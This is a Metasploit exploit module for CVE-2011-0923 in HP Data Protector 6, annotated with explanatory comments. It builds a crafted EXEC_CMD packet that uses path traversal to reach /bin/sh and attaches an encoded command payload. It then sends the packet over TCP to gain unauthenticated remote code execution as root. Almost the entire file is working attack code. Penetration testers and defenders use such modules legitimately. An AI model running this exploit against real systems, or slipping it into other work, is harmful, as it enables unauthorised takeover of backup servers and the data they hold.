##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for CVE-2011-0923 (HP Data Protector EXEC_CMD).
#
# Structure: `initialize` registers module metadata and the RPORT option;
# `exploit` builds one request string, sends it over a raw TCP socket, and
# hands off to the payload handler. Only what is visible in this file is
# documented below; the meaning of the individual request bytes is not
# derivable from this source and is left undescribed.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers name, description, authors, references, platform/arch, payload
  # constraints (cmd payloads only, up to 10000 bytes, no NOPs), the single
  # target entry, and the RPORT option with a default of 5555.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HP Data Protector 6 EXEC_CMD Remote Code Execution',
        'Description' => %q{ This exploit abuses a vulnerability in the HP Data Protector service. This flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD command and traverse back to /bin/sh, this allows arbitrary remote code execution under the context of root. },
        'Author' => [
          'ch0ks', # poc
          'c4an', # msf poc
          'wireghoul', # Improved msf
          'Javier Ignacio' # Verified on A06.20
        ],
        'References' => [
          [ 'CVE', '2011-0923'],
          [ 'OSVDB', '72526'],
          [ 'ZDI', '11-055'],
          [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux'],
          [ 'URL', 'https://community.rapid7.com/thread/2253' ]
        ],
        'DisclosureDate' => '2011-02-07',
        'Platform' => %w{linux unix},
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 10000,
          'DisableNops' => true,
          'Compat' => { 'PayloadType' => 'cmd' }
        },
        'Targets' => [
          [ 'HP Data Protector 6.10/6.11/6.20 on Linux', {}]
        ],
        'DefaultTarget' => 0,
        # Reliability, stability and side effects are all left UNKNOWN here.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(5555),])
  end

  # Builds the request, sends it, and starts the payload handler.
  #
  # Error handling: a bare `rescue` (StandardError only) wraps connect, put,
  # handler and the optional read-back; any failure is reported with one
  # print_error. `ensure disconnect` closes the socket on every path.
  def exploit
    # Four random alphabetic characters, spliced into the request twice.
    user = rand_text_alpha(4)

    # Request body: fixed byte sequences with `user` inserted at two points.
    # The literals are reproduced exactly; their protocol meaning is not
    # documented in this file.
    packet = "\x00\x00\x00\xa4\x20\x32\x00\x20"
    packet << user * 2
    packet << "\x00\x20\x30\x00\x20"
    packet << "SYSTEM"
    packet << "\x00\x20\x63\x34\x61\x6e"
    packet << "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20"
    packet << user
    packet << "\x20\x20\x20\x20\x00\x20"
    packet << "\x50\x6f\x63"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20\x30\x00\x20\x30\x00\x20"
    packet << "../../../../../../../../../../"

    shell_mio = "bin/sh"
    # `shell` aliases the same String object as `shell_mio`; the `<<` calls
    # below mutate both (shell_mio is not read again, so this is harmless).
    shell = shell_mio
    # 48 NUL bytes of padding, then the encoded cmd payload and a newline.
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << payload.encoded
    shell << "\n"

    # `+` allocates a new String; packet and shell are left unchanged.
    sploit = packet + shell

    begin
      print_status("Sending our commmand...")
      connect
      sock.put(sploit)
      print_status("Waiting ...")
      handler
      # Read command output from socket if cmd/unix/generic payload was used
      if (datastore['CMD'])
        # Read whatever is available, waiting up to 10 seconds.
        res = sock.get_once(-1, 10)
        # NOTE(review): if get_once returns nil (no data before the timeout),
        # `res.empty?` raises NoMethodError, which the bare rescue below
        # reports as "Error in connection or socket" — confirm get_once's
        # nil-on-timeout behaviour before trusting that message.
        print_status(res.to_s) if not res.empty?
      end
    rescue
      # Catches StandardError only; the original exception is not logged.
      print_error("Error in connection or socket")
    ensure
      disconnect
    end
  end
end